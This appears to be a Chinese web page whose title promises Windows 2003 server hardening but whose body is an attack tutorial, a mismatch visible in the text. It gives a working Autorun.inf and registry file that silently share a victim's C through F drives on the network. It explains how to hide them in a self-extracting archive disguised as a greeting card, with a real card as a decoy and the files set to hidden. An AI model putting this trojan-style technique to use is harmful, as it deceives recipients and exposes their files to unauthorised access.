系統(tǒng)安全之WIN2003服務(wù)器安全加固方案

字號:

用自解壓包刪光別人的硬盤,相信大家都會。我給大家介紹個用自解壓包入侵的方法。
    如果捆綁一個木馬給別人,只要稍有常識的人有殺毒軟件就可以識破。如果不用木馬,用些批處理炸彈、碎片對象文件、或自導(dǎo)入注冊表文件,就可以實現(xiàn)各種攻擊。
    把以下兩行保存為Autorun.inf
    [Autorun]
    open=regedit /s Autorun.reg
    把以下一段保存為Autorun.reg
    REGEDIT4 小蟲網(wǎng)絡(luò)技術(shù)http://www.chinaccna.com
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\c$]
    "Path"="c:\\"
    "Remark"=""
    "Type"=dword:00000000
    "Flags"=dword:00000192
    "Parm1enc"=hex:
    "Parm2enc"=hex:
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
    "Path"="D:\\"
    "Remark"=""
    "Type"=dword:00000000
    "Flags"=dword:00000192
    "Parm1enc"=hex:   
    "Parm2enc"=hex:
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\E$]
    "Path"="E:\\"
    "Remark"=""
    "Type"=dword:00000000
    "Flags"=dword:00000192
    "Parm1enc"=hex:
    "Parm2enc"=hex:
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\F$]
    "Path"="F:\\"
    "Remark"=""
    "Type"=dword:00000000
    "Flags"=dword:00000192
    "Parm1enc"=hex:
    "Parm2enc"=hex:
    比如在當(dāng)今電子賀卡漫天飛的時代,可以把你的自解壓包命名為“猴年賀卡”,包里包個真賀卡,順便把以上兩個文件打包進去,注意要指定文  件解包路徑。當(dāng)收賀卡人點擊自解壓包時真賀卡被解壓的同時,兩個文件就悄悄的被解到指定位置。Autorun.inf必須解到某一分區(qū)的根目錄,名字不能變,可以設(shè)置文件隱藏屬性。
    Autorun.reg文件名和釋放目錄可以任意,可以更好的隱藏,注意Autorun.inf指向目錄正確的地方。
    當(dāng)受害人雙擊有Autorun.inf的分區(qū)時,他的硬盤C、D、E、F分區(qū)就被打開公享。